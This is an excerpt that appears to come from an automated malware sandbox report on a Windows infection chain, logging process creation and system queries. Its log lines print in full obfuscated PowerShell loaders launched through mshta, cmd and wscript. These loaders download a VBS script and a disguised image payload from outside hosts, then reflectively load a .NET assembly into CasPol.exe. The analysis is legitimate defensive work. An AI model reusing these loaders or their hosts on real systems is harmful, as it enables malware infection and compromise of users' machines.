                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFAE8.tmp" "c:\Users\user\AppData\Local\Temp\gxlowwdn\CSC56436D359159402F8D448B12D32335C6.TMP"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovalsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'je5zeffkngxbicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelxrzugugicagicagicagicagicagicagicagicagicagicagicaglu1fbwjfcmrlrkluavrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1pbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicags3lrqw1wsklrb0csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagigjqlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbrbsx1aw50icagicagicagicagicagicagicagicagicagicagicagielyr2rwshzttwwssw50uhryicagicagicagicagicagicagicagicagicagicagicagiezmtnpvbmzmryk7jyagicagicagicagicagicagicagicagicagicagicagicattmfnzsagicagicagicagicagicagicagicagicagicagicagicaienzqiiagicagicagicagicagicagicagicagicagicagicagicattmftrxnwywnficagicagicagicagicagicagicagicagicagicagicagigigicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaktll4uwq0bee6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1lje0mi42mc81ntevc2hlaxntewdpcmx3ag9sb3zlzg1lywxvdhn0awxsywxzb3nozwxvdmvzbwv0cnvsewzyb210agvozwfydc50suyilcikru52okfquerbvefcc2hlaxntewdpcmx3ag9sb3zlzg1lywxvdhn0awxsywxzb3nozwxvdmvzbwv0cnvses52ynmildasmck7u1rhunqtc0xlzxaomyk7aw5wt0tflwv4cfjlu3njb04gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxzagvpc215z2lybhdob2xvdmvkbwvhbg90c3rpbgxhbhnvc2hlbg92zxntzxrydwx5lnzicyi='+[char]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'je5zeffkngxbicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelxrzugugicagicagicagicagicagicagicagicagicagicagicaglu1fbwjfcmrlrkluavrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1pbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicags3lrqw1wsklrb0csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagigjqlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbrbsx1aw50icagicagicagicagicagicagicagicagicagicagicagielyr2rwshzttwwssw50uhryicagicagicagicagicagicagicagicagicagicagicagiezmtnpvbmzmryk7jyagicagicagicagicagicagicagicagicagicagicagicattmfnzsagicagicagicagicagicagicagicagicagicagicagicaienzqiiagicagicagicagicagicagicagicagicagicagicagicattmftrxnwywnficagicagicagicagicagicagicagicagicagicagicagigigicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaktll4uwq0bee6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1lje0mi42mc81ntevc2hlaxntewdpcmx3ag9sb3zlzg1lywxvdhn0awxsywxzb3nozwxvdmvzbwv0cnvsewzyb210agvozwfydc50suyilcikru52okfquerbvefcc2hlaxntewdpcmx3ag9sb3zlzg1lywxvdhn0awxsywxzb3nozwxvdmvzbwv0cnvses52ynmildasmck7u1rhunqtc0xlzxaomyk7aw5wt0tflwv4cfjlu3njb04gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxzagvpc215z2lybhdob2xvdmvkbwvhbg90c3rpbgxhbhnvc2hlbg92zxntzxrydwx5lnzicyi='+[char]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $portioned = 'jhbyzw9idgfpbnmgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskbgfsbhlnywdnaw5nid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskdgf1bnrpbmdsesa9icrsywxsewdhz2dpbmcurg93bmxvywreyxrhkcrwcmvvynrhaw5zktskbm9udmlyz2lucya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcr0yxvudgluz2x5ktskbmv3c21lbia9icc8pejbu0u2nf9tvefsvd4+jzskc3bpcml0dwfsaxn0awmgpsanpdxcqvnfnjrfru5epj4noyrhc2fmb2v0awrhcya9icrub252axjnaw5zlkluzgv4t2yojg5ld3ntzw4poyrzbm9vemugpsakbm9udmlyz2lucy5jbmrlee9mkcrzcglyaxr1ywxpc3rpyyk7jgfzywzvzxrpzgfzic1nzsawic1hbmqgjhnub296zsatz3qgjgfzywzvzxrpzgfzoyrhc2fmb2v0awrhcyarpsakbmv3c21lbi5mzw5ndgg7jg95zxmgpsakc25vb3plic0gjgfzywzvzxrpzgfzoyrzdglsbgluzya9icrub252axjnaw5zlln1ynn0cmluzygkyxnhzm9ldglkyxmsicrvewvzktskag9sbg93bmvzc2vzid0glwpvaw4gkcrzdglsbgluzy5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkc3rpbgxpbmcutgvuz3rokv07jgnvbgvzbgf3cya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghvbgxvd25lc3nlcyk7jg1hbmfnzw1lbnrzid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgky29szxnsyxdzktskamv3zmlzaca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrqzxdmaxnolkludm9rzsgkbnvsbcwgqcgnmc9uq3gzmc9yl2vllmv0c2fwly86c3b0dggnlcanjgzvcmvizwfyjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcanq2fzug9sjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlccxjywnjgzvcmvizwfyjykpow==';$reprovals = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($portioned));invoke-expression $reprovals
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'je5zeffkngxbicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelxrzugugicagicagicagicagicagicagicagicagicagicagicaglu1fbwjfcmrlrkluavrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1pbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicags3lrqw1wsklrb0csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagigjqlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbrbsx1aw50icagicagicagicagicagicagicagicagicagicagicagielyr2rwshzttwwssw50uhryicagicagicagicagicagicagicagicagicagicagicagiezmtnpvbmzmryk7jyagicagicagicagicagicagicagicagicagicagicagicattmfnzsagicagicagicagicagicagicagicagicagicagicagicaienzqiiagicagicagicagicagicagicagicagicagicagicagicattmftrxnwywnficagicagicagicagicagicagicagicagicagicagicagigigicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaktll4uwq0bee6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1lje0mi42mc81ntevc2hlaxntewdpcmx3ag9sb3zlzg1lywxvdhn0awxsywxzb3nozwxvdmvzbwv0cnvsewzyb210agvozwfydc50suyilcikru52okfquerbvefcc2hlaxntewdpcmx3ag9sb3zlzg1lywxvdhn0awxsywxzb3nozwxvdmvzbwv0cnvses52ynmildasmck7u1rhunqtc0xlzxaomyk7aw5wt0tflwv4cfjlu3njb04gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxzagvpc215z2lybhdob2xvdmvkbwvhbg90c3rpbgxhbhnvc2hlbg92zxntzxrydwx5lnzicyi='+[char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'je5zeffkngxbicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelxrzugugicagicagicagicagicagicagicagicagicagicagicaglu1fbwjfcmrlrkluavrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvstg1pbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicags3lrqw1wsklrb0csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagigjqlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbrbsx1aw50icagicagicagicagicagicagicagicagicagicagicagielyr2rwshzttwwssw50uhryicagicagicagicagicagicagicagicagicagicagicagiezmtnpvbmzmryk7jyagicagicagicagicagicagicagicagicagicagicagicattmfnzsagicagicagicagicagicagicagicagicagicagicagicaienzqiiagicagicagicagicagicagicagicagicagicagicagicattmftrxnwywnficagicagicagicagicagicagicagicagicagicagicagigigicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaktll4uwq0bee6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1lje0mi42mc81ntevc2hlaxntewdpcmx3ag9sb3zlzg1lywxvdhn0awxsywxzb3nozwxvdmvzbwv0cnvsewzyb210agvozwfydc50suyilcikru52okfquerbvefcc2hlaxntewdpcmx3ag9sb3zlzg1lywxvdhn0awxsywxzb3nozwxvdmvzbwv0cnvses52ynmildasmck7u1rhunqtc0xlzxaomyk7aw5wt0tflwv4cfjlu3njb04gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxzagvpc215z2lybhdob2xvdmvkbwvhbg90c3rpbgxhbhnvc2hlbg92zxntzxrydwx5lnzicyi='+[char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $portioned = 'jhbyzw9idgfpbnmgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskbgfsbhlnywdnaw5nid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskdgf1bnrpbmdsesa9icrsywxsewdhz2dpbmcurg93bmxvywreyxrhkcrwcmvvynrhaw5zktskbm9udmlyz2lucya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcr0yxvudgluz2x5ktskbmv3c21lbia9icc8pejbu0u2nf9tvefsvd4+jzskc3bpcml0dwfsaxn0awmgpsanpdxcqvnfnjrfru5epj4noyrhc2fmb2v0awrhcya9icrub252axjnaw5zlkluzgv4t2yojg5ld3ntzw4poyrzbm9vemugpsakbm9udmlyz2lucy5jbmrlee9mkcrzcglyaxr1ywxpc3rpyyk7jgfzywzvzxrpzgfzic1nzsawic1hbmqgjhnub296zsatz3qgjgfzywzvzxrpzgfzoyrhc2fmb2v0awrhcyarpsakbmv3c21lbi5mzw5ndgg7jg95zxmgpsakc25vb3plic0gjgfzywzvzxrpzgfzoyrzdglsbgluzya9icrub252axjnaw5zlln1ynn0cmluzygkyxnhzm9ldglkyxmsicrvewvzktskag9sbg93bmvzc2vzid0glwpvaw4gkcrzdglsbgluzy5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkc3rpbgxpbmcutgvuz3rokv07jgnvbgvzbgf3cya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghvbgxvd25lc3nlcyk7jg1hbmfnzw1lbnrzid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgky29szxnsyxdzktskamv3zmlzaca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrqzxdmaxnolkludm9rzsgkbnvsbcwgqcgnmc9uq3gzmc9yl2vllmv0c2fwly86c3b0dggnlcanjgzvcmvizwfyjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcanq2fzug9sjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlccxjywnjgzvcmvizwfyjykpow==';$reprovals = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($portioned));invoke-expression $reprovalsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00433E1A cpuid 11_2_00433E1A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,11_2_004510CA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,11_2_004470BE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_004511F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,11_2_004512FA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_004513C7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,11_2_004475A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,11_2_0040E679
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_00450A8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,11_2_00450D52
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,11_2_00450D07
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,11_2_00450DED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00450E7A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
